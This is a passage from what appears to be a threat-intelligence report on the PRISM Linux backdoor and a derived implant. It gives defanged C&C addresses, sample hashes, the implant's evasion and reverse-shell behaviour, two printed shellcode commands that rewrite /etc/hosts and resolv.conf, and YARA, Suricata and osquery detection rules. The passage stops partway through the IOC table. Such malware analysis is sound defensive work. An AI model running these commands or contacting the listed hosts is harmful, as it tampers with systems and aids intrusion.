<p>As the actor is using a public git repository to host its malware and infrastructure information, we can obtain the historical data and see its evolution.</p>

<p>For example, we can gather all the IP addresses that the actor has used as C&amp;C servers with the following command:</p>

<pre>
$ git log -p README.md |grep "^+"|grep -v "+++"
+45.199.88[.]86
+154.48.227[.]27
+207.148.118[.]141
+154.48.227[.]27
+165.22.136[.]80
+154.48.227[.]27
+156.236.110[.]79
+43.230.11[.]125
+172.247.127[.]136
+127.0.0[.]1
+192.168.3[.]173
+192.168.3[.]173:80
+192.168.3[.]173
+118.107.180[.]8
+s.rammus[.]me
+s.rammus[.]me:80
+192.168.3[.]150:80
+192.168.3[.]150^80
+192.168.3[.]150^
+^192.168.3[.]150
+^192.168.3[.]133</pre>

<p>The loopback and 192.168.3.x entries in this history are non-routable addresses, so only the public addresses and the s.rammus[.]me host name are usable as network indicators. It is also notable that the malware implant has received several updates over time. We can pull all the binaries uploaded to the repository that are not open-source security tools, as listed here:</p>

<pre>
1.1M        MP.out
15K         git
15K         git (1)
15K         git (2)
16K         git (3)
1.1M        git (4)
1.1M        git (5)
15K         git443
16K         git53
1.1M        gitest
11K         hostname
12K         ps
10K         wm
12K         wm (1)
14K         wm32
15K         wmgithub

$ shasum -a 256 *

933b4c6c48f82bbb62c9b1a430c7e758b88c03800c866b36c2da2a5f72c93657  MP.out
f19043c7b06db60c8dd9ff55636f9d43b8b0145dffe4c6d33c14362619d10188  git
eeabee866fd295652dd3ddbc7552a14953d91b455ebfed02d1ccdee6c855718d  git (1)
3a4998bb2ea9f4cd2810643cb2c1dae290e4fe78e1d58582b6f49b232a58575a  git (2)
3366676681a31feadecfe7d0f5db61c4d6085f5081b2d464b6fe9b63750d4cd8  git (3)
cc3752cc2cdd595bfed492a2f108932c5ac28110f5f0d30de8681bd10316b824  git (4)
baf2fa00711120fa43df80b8a043ecc0ad26edd2c5d966007fcd3ffeb2820531  git (5)
eb64ee2b6fc52c2c2211018875e30ae8e413e559bcced146af9aa84620e3312f  git443
d1d65b9d3711871d8f7ad1541cfbb7fa35ecc1df330699b75dd3c1403c754278  git53
77ddc6be62724ca57ff45003c5d855df5ff2b234190290545b064ee4e1145f63  gitest
1de9232f0bec9bd3932ae3a7a834c741c4c378a2350b4bbb491a102362235017  hostname
7ed15e59a094ca0f9ccac4c02865172ad67dcfc5335066f67fe3f11f68dd7473  ps
1eb6973f70075ede421bed604d7642fc844c5a47c53d0fb7a9ddb21b0bb2519a  wm
6f983303bb82d8cc9e1ebf8c6c1eb7c17877debc66cd1ac7c9f78b24148a4e46  wm (1)
e4fe57d9d2c78a097f38cba7a9aad7ca53da24ecbcad0c1e00f21d34d8a82de4  wm32
b08d48cc12c6afa5821a069bd6895175d5db4b5a9dde4e04d587c3dec68b1920  wmgithub</pre>

<p>Grouping them by size, we observed two different clusters: 1) one containing samples that are around 15K and 2) one containing samples that are around 1.1MB. After a quick triage, we assessed that the light-weight binaries are standard PRISM backdoors, while the bigger sized binaries belong to another malware family. Given the git history, we were able to observe how the actor started using the PRISM backdoor for their operations, and then on July 16, 2019, switched to the custom implant in commit 6055e31cc87679a7198e1143d1eddcdfc9313816. It is also notable that this custom implant&rsquo;s binaries are packed using a modified version of UPX.</p>

<p>The following binary analysis of said custom implants uses the sample with SHA256 aaeee0e6f7623f0087144e6e318441352fef4000e7a8dd84b74907742c244ff5 as a reference.</p>

<p><img alt="PRISM evolution" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_evolution.jpg" /></p>

<p style="text-align:center">Figure 6. Detection evolution for analyzed sample</p>

<p>The binaries from this particular malware family are quite large in size (1-3 MB compared to the ~15KB of the typical PRISM binary). This is due to the binaries having libcurl statically compiled into them, which is evident due to the presence of known libcurl strings. We have named this malware family &ldquo;PrismaticSuccessor.&rdquo;</p>

<p>By decompiling the main function, Alien Labs observed that the binary takes an optional parameter. If said parameter is the character &ldquo;9,&rdquo; it prints the configuration. For these binaries, the configuration consists of two URLs: 1) HostUrl is used to fetch the C&amp;C host and 2) PortUrl is used to fetch the port number to contact the previous host on.</p>

<p>We have also observed that immediately after these actions, the malware attempts to open and lock /var/lock/sshd.lock. If it fails to do so, it fakes a segmentation fault. This procedure ensures that the malware is not already running in the machine (see figure 7).</p>

<p><img alt="PRISM configuration" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_configuration.jpg" /></p>

<p style="text-align:center">Figure 7. Configuration and lock check</p>

<p>Next, the malware decrypts a string containing a process name, which is used to overwrite &ldquo;argv&rdquo;. This technique avoids using prctl. The possible command line arguments are also smashed and replaced by the whitespace character (see figure 8).</p>

<p style="text-align:center"><img alt="argv smashing" data-original="https://cdn-cybersecurity.att.com/blog-content/Argv_smashing.jpg" /></p>

<p style="text-align:center">Figure 8. Argv smashing</p>

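<p>Note that the aMcwfkvf variable contains the &ldquo;[mcwfkvf]&rdquo; value, which is decrypted to &ldquo;[kauditd]&rdquo; in &ldquo;src,&rdquo; a name that resembles how the kauditd kernel thread appears in process listings. The decryption routine is ROT13 with -2 as key, that is, a letter rotation that shifts each character back by two positions rather than by the usual thirteen. This particular ROT13 only rotates lower- and upper-case letters, not symbols or numbers (see figure 9).</p>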

<p><img alt="rot13 implementation" data-original="https://cdn-cybersecurity.att.com/blog-content/rot13_implementation.jpg" /></p>

<p style="text-align:center">Figure 9. ROT13 implementation</p>

<p>The above actions conclude the environment setup process for the malware. Next, the malicious activity begins, which includes spawning child processes, so the malware can multitask. This also makes it harder to trace the malware (see figure 10).</p>

<p style="text-align:center"><img alt="PRISM malicious activity loop" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_malicious_activity_loop.jpg" /></p>

<p style="text-align:center">Figure 10. Malicious activity loop</p>

<p>Spawning child processes:</p>

<p>The first fork terminates the parent and only lets the child continue &ndash; the first-order child.</p>

<p>First-Order Child. This first-order child will fork again, spawning a second-order child. The first-order child will execute the &ldquo;While&rdquo; loop body endlessly, spawning three additional child processes (third-order children). The second-order child will contact the fallback C&amp;C server.</p>

<p>Second-Order Child. The second-order child will open a reverse shell session to a fallback hard-coded C&amp;C server. The sample ships with up to three C&amp;C addresses, encrypted with ROT13. The malware attempts to resolve these addresses via gethostbyname. The first one that resolves successfully is contacted on TCP port 80. For this particular sample, the secondary C&amp;C address list is &ldquo;z0gg[.]me&rdquo;, &ldquo;x63[.]in&rdquo; and &ldquo;x47[.]in&rdquo; (see figure 11).</p>

<p><img alt="ROT13 encrypted c&amp;c" data-original="https://cdn-cybersecurity.att.com/blog-content/ROT13_encrypted_cc.jpg" /></p>

<p style="text-align:center">Figure 11. ROT13 encrypted C&amp;C list</p>

<p>The server is also required to reply with a password in order for the reverse shell to be successfully established. However, the required password is not shipped in the binary. Instead, the malware calculates the MD5 hash of the replied buffer and compares it to the hard-coded value &ldquo;ef4a85e8fcba5b1dc95adaa256c5b482&rdquo;.</p>

<p>This communication is performed whether the primary C&amp;C server is successfully contacted or not. The primary C&amp;C server does not include a password mechanism (see figure 12).</p>

<p style="text-align:center"><img alt="PRISM secondary c&amp;c" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_secondary_cc.jpg" /></p>

<p style="text-align:center">Figure 12. Secondary command and control server contact</p>

<p>The first of the third-order child processes gets the C&amp;C host and port from github and opens a reverse shell to the IP:PORT indicated in those URLs (see figure 13 and 14).</p>

<p><img alt="PRISM c&amp;c host" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_cc_host.jpg" /></p>

<p style="text-align:center">Figure 13. Obtaining C&amp;C host from github</p>

<p><img alt="PRISM  c&amp;c port" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_cc_port.jpg" /></p>

<p style="text-align:center">Figure 14. Obtaining C&amp;C port from github</p>

<p>The function to spawn a shell to a host is very similar to the one found in PRISM&rsquo;s source code, if not identical (see figure 15 and 16).</p>

<p><img alt="PRISM shell session spawned" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_shell_session.jpg" /></p>

<p style="text-align:center">Figure 15. Spawning a shell session to C&amp;C</p>

<p><img alt="PRISM reverse shell" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_reverse_shell.jpg" /></p>

<p style="text-align:center">Figure 16. PRISM function to spawn the reverse shell session</p>

<p>If it fails to spawn the shell, the child dies and the whole process will be reattempted in 15 seconds.</p>

<p>The other two third-order child processes jump to shellcode routines. These routines are encrypted with a hard-coded 8-byte XOR key and include a small self-decrypting stub (see figures 17 and 18).</p>

<p><img alt="PRISM first shellcode" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_first_shellcode.jpg" /></p>

<p style="text-align:center">Figure 17. First shellcode routine</p>

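<p>Each of these routines builds a command on the stack and launches it. For the analyzed sample, the commands were <code>/bin/sh -c sed -i "/\\(z0gg.me\\|x63.in\\)/d" /etc/hosts</code> and <code>/bin/sh -c "grep -q &#39;nameserver 8.8.8.8&#39; /etc/resolv.conf||echo &#39;nameserver 8.8.8.8&#39; &gt;&gt; /etc/resolv.conf"</code>. The first deletes any lines in /etc/hosts that match those two domain names, and the second appends a nameserver 8.8.8.8 entry to /etc/resolv.conf if one is not already present. (See figure 18.)</p>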

<p><img alt="PRISM emulated stack" data-original="https://cdn-cybersecurity.att.com/blog-content/prism_emulated_stack.jpg" /></p>

<p style="text-align:center">Figure 18. Emulated stack with example command string</p>

<p>When Alien Labs searched for the obtained command lines, we got an <a href="https://unix.stackexchange.com/questions/561525/linux-suspicious-process-spawn-by-init" target="_blank" rel="noopener noreferrer">interesting result in StackOverflow</a>&nbsp;where a user complains about a suspicious process on their machine. This indicates that the threat is being used in the wild.</p>

<h2>Other variants</h2>

<p>We have observed other actors using the PRISM backdoor for their operations. However, in the majority of these cases, the actor(s) use the original PRISM backdoor as is, without making any major modifications. This fact, combined with the open-source nature of the backdoor, prevents us from properly tracking the activity of the actor(s).</p>

<h2>Conclusion</h2>

<p>PRISM is an open-source, simplistic, and straightforward backdoor. Its traffic is clearly identifiable and its binaries are easy to detect. Despite this, PRISM&rsquo;s binaries have gone undetected until now, and its C&amp;C server has remained online for more than 3.5 years. This shows that while bigger campaigns that receive more attention are usually detected within hours, smaller ones can slip through.</p>

<p>Alien Labs expects the adversaries to remain active and conduct operations with this toolset and infrastructure. We will continue to monitor and report any noteworthy findings.</p>

<h2>Detection methods</h2>

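<p>The following associated detection methods are in use by Alien Labs. They can be used by readers to tune or deploy detections in their own environments or for aiding additional research. These signatures match strings, a user agent and a file path taken from the analyzed samples, so test them against your own baseline before deploying, and do not treat the absence of a match as proof that a host is clean.</p>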
<div class="table-responsive">
<table style="border-collapse:collapse" class="table">
	<tbody>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:2px solid #959595; height:27px;padding:24px;">
			<p>SURICATA IDS SIGNATURES</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:35px;padding:24px;">
			<pre>alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"AV TROJAN WaterDropX CnC Beacon"; flow:established,to_server; content:"GET"; http_method; content:"v="; http_uri; content:"act="; http_uri; content:"agent-waterdropx"; http_user_agent; startswith; endswith; reference:md5,5b714b1eb765493f2ff77e068a7c1a4f; classtype:trojan-activity; sid:4002615; rev:1;)</pre>
			</td>
		</tr>
	</tbody>
</table>
</div>

<p>&nbsp;</p>

<div class="table-responsive">
	<table style="border-collapse:collapse" class="table">
	<tbody>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:2px solid #959595; height:27px; padding:24px;">
			<p>OSQUERY QUERIES</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
SELECT path as file_name, directory as file_path, uid as source_userid, gid as user_group_id, &#39;WaterDropx backdoor&#39; as malware_family from file WHERE path = &#39;/etc/.xid&#39;;</pre>
			</td>
		</tr>
	</tbody>
</table>
</div>
<p>&nbsp;</p>

<div class="table-responsive">
	<table style="border-collapse:collapse" class="table">
	<tbody>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:2px solid #959595; height:27px; width:552px">
			<p>YARA RULES</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:35px; width:552px">
			<pre>
rule PRISM {&#10;&#10;    meta:&#10;&#10;        author = "AlienLabs"&#10;&#10;        description = "PRISM backdoor"&#10;&#10;        reference = "https://github.com/andreafabrizi/prism/blob/master/prism.c"&#10;&#10;&#10;    strings:&#10;&#10;        $s1 = "I&#39;m not root :("&#10;&#10;        $s2 = "Flush Iptables:\t"&#10;&#10;        $s3 = " Version:\t\t%s\n"&#10;&#10;        $s4 = " Shell:\t\t\t%s\n"&#10;&#10;        $s5 = " Process name:\t\t%s\n"&#10;&#10;        $s6 = "iptables -F 2&gt; /dev/null"&#10;&#10;        $s7 = "iptables -P INPUT ACCEPT 2&gt; /dev/null"&#10;&#10;        $s8 = " started\n\n# "&#10;&#10;&#10;        $c1 = {&#10;&#10;            E8 [4] 8B 45 ?? BE 00 00 00 00 89 C7 E8 [4] 8B 45 ?? BE 01 00 00 00&#10;&#10;            89 C7 E8 [4] 8B 45 ?? BE 02 00 00 00 89 C7 E8 [4] BA 00 00 00 00&#10;&#10;            BE [4] BF [4] B8 00 00 00 00 E8&#10;&#10;        }&#10;&#10;        $c2 = {&#10;&#10;            BA 00 00 00 00&#10;&#10;            BE 01 00 00 00&#10;&#10;            BF 02 00 00 00&#10;&#10;            E8 [4]&#10;&#10;            89 45 [1]&#10;&#10;            83 ?? ?? 00&#10;&#10;        }&#10;&#10;&#10;    condition:&#10;&#10;        uint32(0) == 0x464C457F and&#10;&#10;        filesize &lt; 30KB and&#10;&#10;        (4 of ($s*) or all of ($c*))&#10;&#10;}</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; width:552px">
			<pre>
rule PrismaticSuccessor : LinuxMalware&#10;&#10;{&#10;&#10;   meta:&#10;&#10;       author = "AlienLabs"&#10;&#10;       description = "Prismatic Successor malware backdoor"&#10;&#10;       reference = "aaeee0e6f7623f0087144e6e318441352fef4000e7a8dd84b74907742c244ff5"&#10;&#10;       copyright = "Alienvault Inc. 2021"&#10;&#10;&#10;   strings:&#10;&#10;       $s1 = "echo -e \""&#10;&#10;       $s2 = "[\x1B[32m+\x1B[0m]`/bin/hostname`"&#10;&#10;       $s3 = "[\x1B[32m+\x1B[0m]`/usr/bin/id`"&#10;&#10;       $s4 = "[\x1B[32m+\x1B[0m]`uname -r`"&#10;&#10;       $s5 = "[+]HostUrl-&gt;\t%s\n"&#10;&#10;       $s6 = "[+]PortUrl-&gt;\t%s\n"&#10;&#10;       $s7 = "/var/run/sshd.lock"&#10;&#10;&#10;       $shellcode = {&#10;&#10;           48 31 C9&#10;&#10;           48 81 E9 [4]&#10;&#10;           48 8D 05 [4]&#10;&#10;           48 BB [8]&#10;&#10;           48 31 [2]&#10;&#10;           48 2D [2-4]&#10;&#10;           E2 F4&#10;&#10;       }&#10;&#10;&#10;       $c1 = {&#10;&#10;           8B 45 ??&#10;&#10;           BE 00 00 00 00&#10;&#10;           89 C7&#10;&#10;           E8 [4]&#10;&#10;           8B 45 ??&#10;&#10;           BE 01 00 00 00&#10;&#10;           89 C7&#10;&#10;           E8 [4]&#10;&#10;           8B 45 ??&#10;&#10;           BE 02 00 00 00&#10;&#10;           89 C7&#10;&#10;           E8 [4]&#10;&#10;           8B 45 ??&#10;&#10;           BA [4]&#10;&#10;           BE [4]&#10;&#10;           89 C7&#10;&#10;           E8&#10;&#10;       }&#10;&#10;&#10;   condition:&#10;&#10;       uint32(0) == 0x464C457F and&#10;&#10;       filesize &gt; 500KB and filesize &lt; 5MB and&#10;&#10;       5 of ($s*) and&#10;&#10;       all of ($c*) and&#10;&#10;       #shellcode == 2&#10;&#10;}</pre>
			</td>
		</tr>
	</tbody>
</table>
</div>
<p>&nbsp;</p>
<h2>Associated indicators (IOCs)</h2>

<p>The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the <a href="https://otx.alienvault.com/pulse/60c31c4e4978e9721446c121" target="_blank" rel="noopener noreferrer">OTX Pulse</a>. Please note that the pulse may include other related activity that is outside the scope of this report.</p>

<div class="table-responsive">
	<table style="border-collapse:collapse" class="table">
	<tbody>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:2px solid #959595; height:27px; padding:24px;">
			<p>TYPE</p>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:2px solid #959595; height:27px; padding:24px;">
			<p>INDICATOR</p>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:2px solid #959595; height:27px; padding:24px;">
			<p>DESCRIPTION</p>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
05fc4dcce9e9e1e627ebf051a190bd1f73bc83d876c78c6b3d86fc97b0dfd8e8</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
PRISM v0.5</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
0af3e44967fb1b8e0f5026deb39852d4a13b117ee19986df5239f897914d9212</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
PRISM v0.5</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
0f42b737e30e35818bbf8bd6e58fae980445f297034d4e07a7e62a606d219af8</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
Tiger0.5</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
0fba35856fadad942a59a90fc60784e6cceb1d8002af96d6cdf8e8c3533025f7</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:35px; padding:24px;">
			<pre>
PRISM v0.5 (stripped down)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
342e7a720a738bf8dbd4e5689cad6ba6a4fc6dd6808512cb4eb294fb3ecf61cd</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5 (stripped down)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
3a3c701e282b7934017dadc33d95e0cc57e43a124f14d852f39c2657e0081683</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5 (stripped down)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
5999c1a4a281a853378680f20f6133e53c7f6d0167445b968eb49b844f37eab5</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
98fe5ed342da2b5a9d206e54b5234cfeeed35cf74b60d48eb0ef3dd1d7d7bd59</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v1</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
a8c68661d1632f3a55ff9b7294d7464cc2f3ece63a782c962f1dc43f0f968e33</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Udevd v1.0</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
af55b76d6c3c1f8368ddd3f9b40d1b6be50a2b97b25985d2dde1288ceab9ff24</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5 (stripped down)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
b6844ca4d1d7c07ed349f839c861c940085f1a30bbc3fc4aad0b496e8d492ce0</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
WaterDropx v12</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
b8215cafbea9c61df8835a3d52c40f9d2c6a37604dd329ef784e9d92bad1f30f</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
b8cceb317a5d2febcd60318c1652af61cd3d4062902820e79a9fb9a4717f7ba2</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
be7ec385e076c1c1f676d75e99148f05e754ef5b189e006fb53016ce9aef59e0</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5 (stripped down)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
c679600b75c6e84b53f4e6e21f3acbec1621c38940c8f3756d0b027c7a058d9c</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
c802fa50409edf26e551ee0d134180aa1467a4923c759a2d3204948e14a52f12</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
c8525243a68cba92521fb80a73136aaa19794b4772c35d6ecfec0f82ecad5207</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v0.5</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
d3fa1155810be25f9b9a889ee64f845fc6645b2b839451b59cfa77bbc478531f</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
WaterDropx v9</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
dd5f933598184426a626d261922e1e82cb009910c25447b174d46e9cac3d391a</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
WaterDropx v7</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
e14d75ade6947141ac9b34f7f5743c14dbfb06f4dfb3089f82595d9b067e88c2</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v2.2</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
f126c4f8b4823954c3c69121b0632a0e2061ef13feb348eb81f634379d011913</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM v3</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
DOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
457467[.]com</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
